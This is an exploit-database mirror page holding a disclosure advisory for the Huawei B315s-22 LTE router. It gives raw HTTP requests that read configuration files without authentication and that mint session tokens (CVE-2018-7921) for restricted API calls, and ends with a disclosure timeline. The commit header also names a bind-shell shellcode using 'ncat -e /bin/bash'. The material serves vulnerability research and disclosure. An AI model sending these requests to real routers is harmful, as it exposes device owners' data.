bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/45971.txt
Offensive Security a07949d1c7 DB: 2018-12-12 
21 changes to exploits/shellcodes

SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)
LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)
XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection
McAfee True Key - McAfee.TrueKey.Service Privilege Escalation

DomainMOD 4.11.01 - Cross-Site Scripting
DomainMOD 4.11.01 - 'raid' Cross-Site Scripting

Tourism Website Blog - Remote Code Execution / SQL Injection
Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery
PrestaShop 1.6.x/1.7.x - Remote Code Execution
DomainMOD 4.11.01 - Cross-Site Scripting
PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion
TP-Link wireless router Archer C1200 - Cross-Site Scripting
Huawei B315s-22 - Information Leak
ZTE ZXHN H168N - Improper Access Restrictions
Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure
IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting
Apache OFBiz 16.11.05 - Cross-Site Scripting
HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection
WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
Adobe ColdFusion 2018 - Arbitrary File Upload

Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
2018-12-12 05:01:43 +00:00

124 lines
No EOL
3.3 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#Product Family: LTE
#Model B315s 22
#Firmware version: 21.318.01.00.26
#Author: Usman Saeed (usman [at] xc0re.net)
1. Unauthenticated access to sensitive files:
It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server.
POC:
By sending a simple GET request without authentication cookie one can get see valid responses:
Request:
GET /config/deviceinformation/config.xml HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
<config>
<devicename>1</devicename>
<serialnumber>0</serialnumber>
<imei>1</imei>
<imsi>1</imsi>
<iccid>0</iccid>
<msisdn>1</msisdn>
<hardwareversion>1</hardwareversion>
<softwareversion>1</softwareversion>
Other resources accessible are:
/config/dialup/config.xml
/config/global/config.xml
/config/global/net-type.xml
/config/lan/config.xml
/config/pcassistant/config.xml
/config/voice/config.xml
/config/wifi/configure.xml
## After discussion with Huawei, according to them as the consequence of this vulnerability is quite low thus they marked it as a non-vulnerability.
2. Unauthenticated valid token generation [CVE-2018-7921]
It was observed that an unauthenticated user can generate “SessionID” and “__RequestVerificationToken” by simply sending an HTTP GET request to “/api/webserver/SesTokInfo”.
These tokens, although might not give the user full access to the router but using these, one can access to several restricted resources on the router.
POC:
First, we send a GET request, as mentioned above.
Request:
GET /api/webserver/SesTokInfo HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Content-Length: 0
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
<response>
<SesInfo>SessionID=<omitted></SesInfo>
<TokInfo><omitted></TokInfo>
</response>
Now we use these tokens in one of our request where authentication is required:
Request:
GET /api/cradle/status-info HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
__RequestVerificationToken: <omitted>
X-Requested-With: XMLHttpRequest
Cookie: SessionID=<omitted>
DNT: 1
Connection: close
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
It is to note with an invalid, expired authentication session, the response is:
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
<error>
<code>125002</code>
<message></message>
</error>
[+] Responsible Disclosure:
Vulnerabilities identified 31/07/2018
Reported to Huawei 31/07/2018
Huwaei patched the vulnerability and issued a CVE 31/08/2018
Public disclosure 01/09/2018
Reference in a new issue View git blame Copy permalink